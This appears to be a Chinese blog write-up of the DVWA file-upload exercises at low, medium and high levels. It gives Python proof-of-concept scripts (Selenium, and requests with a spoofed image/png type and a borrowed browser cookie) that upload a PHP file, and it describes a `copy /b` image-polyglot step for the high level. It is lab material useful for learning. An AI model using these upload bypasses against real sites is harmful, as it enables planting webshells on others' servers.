Level-Low
最近了解了一下python的selenium,干脆用它写一个low级别的POC吧~
from selenium.webdriver import Chrome
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select
import time
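# Drive a real browser through DVWA (low level) and report whether the
# upload form accepts the local file.  Every element lookup below retries for
# up to 10 s instead of failing the moment a page has not finished rendering;
# the explicit title wait is kept because the login step keys off the title.
driver = Chrome()
driver.implicitly_wait(10)
try:
    driver.get("http://192.168.117.130/DVWA-1.9/login.php")
    WebDriverWait(driver, 10).until(lambda d: "Login" in d.title)

    # Fill in the login form and submit it.
    driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
    driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
    driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/p/input').click()

    # Open the security-level page, set the level to "low" and submit.
    # Select() works on the <select> directly; clicking it open first is
    # not needed (and a second lookup of the same element was redundant).
    driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
    level_select = Select(driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/select'))
    level_select.select_by_value("low")
    driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/input[1]').click()

    # Open the upload form, choose the local file and submit.
    driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
    driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[2]').send_keys('/path/one.php')
    driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[3]').click()

    # DVWA reports the upload result inside <pre>; the file name showing up
    # there is what this check treats as "the server accepted the file".
    # `marker` replaces the original `re`, which shadowed the stdlib module.
    response = driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/pre')
    marker = 'one.php'
    flag = marker in str(response.text)
finally:
    # quit() ends the WebDriver session (close() only closed the window and
    # left the chromedriver process running), and runs even when an element
    # lookup above raises part-way through.
    driver.quit()

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")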
Level-Medium
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import browser_cookie3
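# Post the file straight to the upload handler (medium level) with requests,
# reusing the session cookie of the local Chrome profile instead of logging
# in again.  NOTE(review): if that cookie is stale DVWA will most likely
# redirect to login.php and the marker check below then prints "It is strong"
# for the wrong reason — confirm the response is the upload page when in doubt.
cookie = browser_cookie3.chrome()
URL = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/upload/'

# The file handle must stay open until the request body has been streamed,
# so the POST happens inside the `with` block (the original never closed it).
# The part is declared as image/png exactly as on the page; presumably the
# point is to see whether the server trusts the declared type — verify
# against the level's source.
with open("one.php", "rb") as fl:
    m = MultipartEncoder(
        fields={
            'MAX_FILE_SIZE': '100000',
            'uploaded': ('one.php', fl, 'image/png'),
            'Upload': 'Upload',
        }
    )
    headers = {"Content-Type": m.content_type}
    # requests has no default timeout; without one a hung server blocks forever.
    response = requests.post(URL, data=m, headers=headers, cookies=cookie, timeout=30)

# `marker` replaces the original `re`, which shadowed the stdlib module;
# response.text is the decoded body (str(response.content) gave the bytes repr).
marker = 'one.php'
flag = marker in response.text
if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")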
另:之前在这里遇到了不少问题,单单是处理这些问题就花费了好长时间,现在记录一下:
Level-High
这里就是多加了一个cmd下copy one.png /b + one.txt /a two.png的图片隐写过程(因为high级别对文件大小进行了限制),然后将新得到的two.png传入。这个涉及到后面的文件包含,这里就不写了~